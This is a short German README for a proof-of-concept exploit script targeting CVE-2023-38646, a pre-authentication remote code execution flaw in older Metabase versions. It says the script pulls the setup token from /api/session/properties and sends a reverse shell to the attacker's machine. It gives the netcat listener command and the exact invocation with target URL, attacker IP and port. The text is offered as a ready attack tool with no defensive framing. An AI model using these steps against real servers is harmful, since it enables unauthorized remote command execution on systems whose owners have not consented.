
Metabase Pre-Auth RCE POC
Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server auszuführen. Ich habe das Skript direkt geschrieben, um eine Reverse Shell auf dem Rechner des Angreifers zu erhalten.
Das Skript benötigt die Ziel-URL, die IP des Angreifers und den Port. Die Angabe des Setup-Tokens ist für diesen Exploit nicht erforderlich, da das Skript versucht, es von /api/session/properties abzurufen.
Stellen Sie sicher, dass Sie den Netcat-Listener auf dem Rechner des Angreifers mit dem folgenden Befehl starten:
nc -nlvp {Port}
Führen Sie das POC-Skript mit folgenden Optionen aus:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
